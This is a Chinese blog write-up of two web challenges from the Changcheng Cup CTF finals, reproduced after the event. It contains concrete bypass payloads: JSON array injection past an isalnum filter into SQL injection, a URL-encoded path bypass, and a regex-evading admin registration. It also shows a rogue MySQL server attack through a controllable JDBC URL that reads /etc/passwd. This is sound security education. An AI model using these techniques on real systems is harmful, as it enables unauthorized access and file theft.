长城杯线下赛赛后复现

最新推荐文章于 2024-04-21 14:14:26 发布
最新推荐文章于 2024-04-21 14:14:26 发布
阅读量1k 收藏 3
点赞数 3
分类专栏: ctfwp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/120756272
版权

长城杯线下赛赛后复现

前言

去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。

fancyapi

目录结构

1634087522346.png

逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。

看看backend.go

func Flag(w http.ResponseWriter, r *http.Request ) {
	action:= r.URL.Query().Get("action")
	if action == "" {
		fail(w, "Error getting action")
		return
	}

	token:= r.URL.Query().Get("token")
	if token == "" {
		fail(w, "Error getting token")
		return
	}

	var secret string
	row := db.Sqlite.QueryRow("SELECT secret FROM token;")
	if err := row.Scan(&secret); err != nil {
		fail(w, "Error querying secret token")
		return
	}

	if action == "readFlag" && secret == token {
		data, err := ioutil.ReadFile("flag")
		if err != nil {
			fail(w, "Error reading flag")
			return
		}
		ok(w, fmt.Sprintf("Congrats this is your flag: %s", string(data)))
		return
	}
	ok(w, "Wrong token")
}

关键就在这里,action要readFlag,secrettoken,这个token的值是在数据库里的,再看

1634087643831.png

这里是可以造成sql注入的,注出token即可,但有个过滤,比赛时没有绕过去。。。然后基本上都在想办绕过这个过滤了。。

在app.py处

@app.route("/search", methods=["GET", "POST"])
def search():
   if request.method == "GET":
       return render_template("search.html")
   else:
       data = request.json
       if data['name']:
           if not isinstance(data['name'], str) or not data['name'].isalnum():
               return jsonify({"error": "Bad word detected"})
       if data['votes']:
           if not isinstance(data['votes'], int):
               return jsonify({"error": "Bad word detected"})
       r = requests.post(f"http://{server}/api/search", data=request.data)
       return jsonify(r.json())

/search路由的提交的数据传入go接口进行数据库查询,也就是上面sql注入的地方,提交方式为json。

vote参数为整数型,关键在name参数处有个isalnum。

绕过方法为多参数,但我比赛的时候尝试了多参数但是没有绕过去。后来拿到了wp,在本地简单复现一下。

搭建一个简单的app.py

from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route("/search", methods=["GET", "POST"])
def search():
    if request.method == "GET":
        return "it is GET"
    else:
        data = request.json
        if data['name']:
            if not isinstance(data['name'], str) or not data['name'].isalnum():
                return jsonify({"error": "Bad word detected"})
        if data['votes']:
            if not isinstance(data['votes'], int):
                return jsonify({"error": "Bad word detected"})
        return "Legal data"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

因为isalnum的过滤只能提交字母和数字,如图

1634089479771.png

上面说了多参数,我只想到覆盖,看了wp用的是[]绕过

1634089598924.png

附上一张比赛时的原图(不是我做的)

1634089801686.png

这之后还有个过滤

@app.route("/<path:path>", methods=["GET"])
def handle(path):
    if 'flag' in unquote(path):
        action = request.args.get('action')
        token = request.args.get('token')
        print(action)
        if action == "readFlag":
            return jsonify({"error": "Sorry, readFlag is not permitted"})
        r = requests.get(f"http://{server}/{path}", params={
            "action": action,
            "token": token
        })
    else:
        r = requests.get(f"http://{server}/{path}")
    return jsonify(r.text)

要传入action="readFlag"但这里对readFlag有过滤

readFlag没法绕,这里是对路由进行绕过,这里判断当请求路径为/flag时才进行下面的判断,所以

%66lag?action=readFlag即可

比赛时觉得无解,现在看来学到了很多,还是太菜了

work

一道java题,比赛的时候知道了大致的思路,但没有做出来,赛后复现一下。

主办方后来给了jar包。所以本地复现比较容易。

直接看后台操作

1634099540002.png

主要是这里。

				String url = request.getParameter("url");
        String name = request.getParameter("name");
        String pwd = request.getParameter("pwd");
        ArrayList<UserBean> arrayList = new ArrayList<>();
        if(! (url.isEmpty() || name.isEmpty() || pwd.isEmpty())){
            JdbcUtils jdbcUtils = new JdbcUtils(url,name,pwd);
          ......
        }

这里jdbc参数全可控,搭建恶意mysql服务器读文件即可

但在做这个操作前需要登陆admin

看注册这里

package com.example.jdbcSer;

import com.alibaba.fastjson.JSON;
import org.springframework.web.bind.annotation.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@RestController
public class Register {
    @GetMapping("/register")
    public boolean register(@RequestParam(value = "user", defaultValue = "{\"username\":\"hacker\",\"password\":\"guess\"}")String user) throws Exception {
        user = user.replace("'", "\"");
        Pattern pattern = Pattern.compile("\"username\":\"(.*?)\"");
        Matcher matcher = pattern.matcher(user);
        String username = "";
        while (matcher.find()){
            username =matcher.group();
        }
        if(!username.isEmpty()){
            user = user.replace(username, "\"username\":\"hacker\"");
        }

        UserBean o = JSON.parseObject(user, UserBean.class);
        JdbcUtils jdbcUtils = new JdbcUtils("jdbc:mysql://127.0.0.1:3306/www?serverTimezone=UTC", "root", "root");
        jdbcUtils.insert(o);
        return true;
    }
}

如果按照常规的json格式提交,不管什么username都会被替换成hacker

例如

{"username":"admin","password":"123456"}

1634100998896.png

注册成功,看看表里注册进了什么数据。

1634101057250.png

所以要绕过正则,这个正则很简单,用大小写或者畸形json数据即可,这里去掉双引号变成

{username:"admin","password":"123456"}

1634101169503.png

可以看到注册成功了。登陆

/login?data={username:"admin","password":"123456"}

登陆成功后来到admin。

先起恶意mysql服务器。

脚本地址

https://github.com/allyshka/Rogue-MySql-Server

启动脚本访问

http://127.0.0.1:8080/admin?url=jdbc:mysql://192.168.36.2:3306/www?serverTimezone=UTC&name=123&pwd=123

1634165197538.png

读到/etc/passwd 之后读flag就行。

这题应该还可以用jdbc反序列化,之后学了再来试试。

fmyyy1
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
swpu线下攻防赛后反思
Kr的博客
12-25 557
第一次带队参加本校举办的线下网络攻防。之前参加过两场线下攻防,是跟着学长的,当时才学,懂的不多,所以全程是端茶递水的,赛后也没有总结一下,导致那两场都白参加了,也导致这一次准备不全面。这一次自己带队参加线下攻防,准备阶段和比阶段有很多意识和技术方面的原因导致比被打的很惨,又无能为力。反思记录一下,为以后的攻防比和实际渗透测试环境情况下做准备。   网络安全攻防比是一种更接近实战的...
2021微派种子杯创新性软件编程PK题1
08-03
一、大背景 二、大数据 三、评估方式
第一届长城杯部分wp(个人解题思路)
qq_74806534的博客
04-05 1263
访问蚁剑连接访问/var/www/html/u_c4nt_f1nd_flag.php。
山东物联网蓝盾杯网络空间攻防赛后总结
至臻求学,胸怀云月
09-17 1028
前准备防守机准备: netstat -antpu 查看当前运行进程。 netstat -antpu | grep tcp | grep ESTABLISHED 查看当前tcp已连接的进程 netstat -antpu | grep tcp | grep ESTABLISHED >index.txt 将输出结果重定向至index.txt文件中,在安全状态时运行此命令,以后就以本文件为模板
2024天梯赛后总结
weixin_73550568的博客
04-21 210
这个题当时读错题了,以为在空地相遇也会死亡,结果只有在大本营相遇才会死亡。这道题忘记set还有count函数,直接用二分来做有一个样例超时。这个题忽略了每个字符串第一个字符可能是空格。L1-101 别再来这么多猫娘了!L2-049 鱼与熊掌。L3-037 夺宝大。代码:从大本营跑bfs。L2-050 懂蛇语。
新生赛后总结
qq_32639673的博客
12-08 199
1. 蒲煜凡的约会 题目描述 蒲煜凡学长跟学妹出来约会了!蒲煜凡学长作为一名标准直男,想要给学妹买一杯奶茶,便问学妹喜欢喝什么样的奶茶,学妹回了两个字 随便! 蒲煜凡学长傻眼了,但作为一名优秀的ACMer,他是不会坐以待毙的,他早早便将学妹喜欢喝的奶茶价格和奶茶店的价格表弄到了手!现在你要根据奶茶价格,判断学妹到底喜欢喝哪一种奶茶,如果有多种奶茶价格都符合要求,输入种类靠前的一种 输入描述: 第一行包含一个整数n,表示有n种奶茶 第二行有n个数字a[i],a[i]表示第i种奶茶价格 第三行包含一个整数Q,表
2017江苏省赛后感想
点滴
05-14 447
江苏省感想 凌晓 此次江苏省,心情比较激动,A题时头脑不是很清醒,很冷静,但是组织安排还是比较合理,A题本来以为是水题,但看完题目以后觉得不简单,于是,此时没有过多的去纠结A题,队友们果断跟榜,A出两题。我在一边想A题,后来觉得自己算法会T就放弃了。 然后一起在想H,E题,H题一开始有点想法,但是如果是一条直线就可以用
天梯赛后感悟
03-31 152
1.首先我去年打这个比仅仅得了80分,所以这次参加比的时候挺慌的,因为数据结构实在太菜了 2.这次比的一阶题挺简单的,看够了80分就没看最后一题 3.这次那个迷宫最远门那个题,一看首先想到的是DFS,最后18分,赛后同学告诉我是并查集 4.2-5那一题是栈,我也想到了,最后答案对了,但是三个测试点段错误,我猜是某个小地方没考虑到 5.幸福指数那道题没看懂, 我还要好好的对这...
2019年五一赛后总结
h201601060805的博客
05-28 2795
现在是5月28日,也不是一直忘了写,就是对我来说印象越来越不深了吧,但是这次我感觉对我来说蛮重要的一次,因为。。确实是靠优秀的团队才能把这次数学建模做好的。在这里非常谢谢我的队友们。张慧,冯子豪 这次参前说实话当时其实是不想打的,因为自己一直在学习数学建模相关课程,感觉到自己能力的不足所以不敢说自己可以做多好,老师要求我们来参加我也是希望不要坑了保研的大佬们,我确实是有一点小菜...
2016年省赛后总结
璐潇晓璐的博客
03-27 395
开始之前感觉自己和队友的状态都还好,本来以为是打星队,没想到临时变成了正式队,有点方啊。第一天热身就只做个简单题,什么都测不出来,看到其他两道题都有点蒙,晚上看看学长打印的表达式那道题,没想到第两天就真的出了那个几乎一样的题,只是更难了,抄下来的学长的代码也是没用上,因为看看榜单学长都没有做出来那道题就直接没看,觉得英文题中会有水题,可是翻译了几道都不太好做,最开始一直在做很多人都做出来的进
赛后得失总结
LSD20164388的博客
05-18 474
本次省的收获与教训: 1、太粗心,一大包零食就这样落车上了,带的资料也不知道丢哪去了。 2、反应太慢,签到题花了20多分钟。 3、细节不注意,罚时+++++。 4、被AK题卡了太多的时间,思路不清楚却直接上机敲板子,结果发现用不到,导致中期没出题,白白浪费时间。 5、无后期(后期出题能力太弱)。 总的来说,没出第八题的主要原因就是两个: ①中期被AK题卡了太多时间导致做可做题的时间...
2019第十届蓝桥杯C\C++B组省赛后总结-附件资源
03-05
2019第十届蓝桥杯C\C++B组省赛后总结-附件资源
2023五一题发布
04-28
QQ群:261917685,届时会在QQ群里面费分享资料,点击链接加入群聊【A2023五一数学建模】:...
2018蓝桥杯省题题目
10-18
第九届蓝桥杯省题,源代码在另一篇资源,可以直接看我发的资源文件进行查找,任务书全部要求都已经实现。
毕业设计MATLAB_执行一维相同大小矩阵的QR分解.zip
05-27
毕业设计matlab
ipython-7.9.0.tar.gz
最新发布
05-27
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
debugpy-1.0.0b3-cp37-cp37m-manylinux2010_x86_64.whl
05-27
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
libaacs-devel-0.10.0-1.mga8.i586.rpm
05-27
rpm -i xx.rpm 只要报错遇到aacs的可以看看架构是否一致
泰迪杯数据分析技能
11-10
根据提供的引用内容,泰迪杯数据分析技能题主要涉及以下方面: 1. 分析销售和利润数据,编写分析报告。 2. 对产品销售和利润数据进行年度对比、类比、相关性等分析和预测,以识别趋势。 3. 基于分析和预测结果,设计一个大屏幕显示数据指标和可视化图表,以代表产品销售和利润情况。 因此,泰迪杯数据分析技能题需要选手具备以下技能: 1. 数据分析和报告撰写能力。 2. 数据分析和预测能力。 3. 数据可视化和大屏幕设计能力。 如果您想更深入了解泰迪杯数据分析技能题,可以参考以下问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值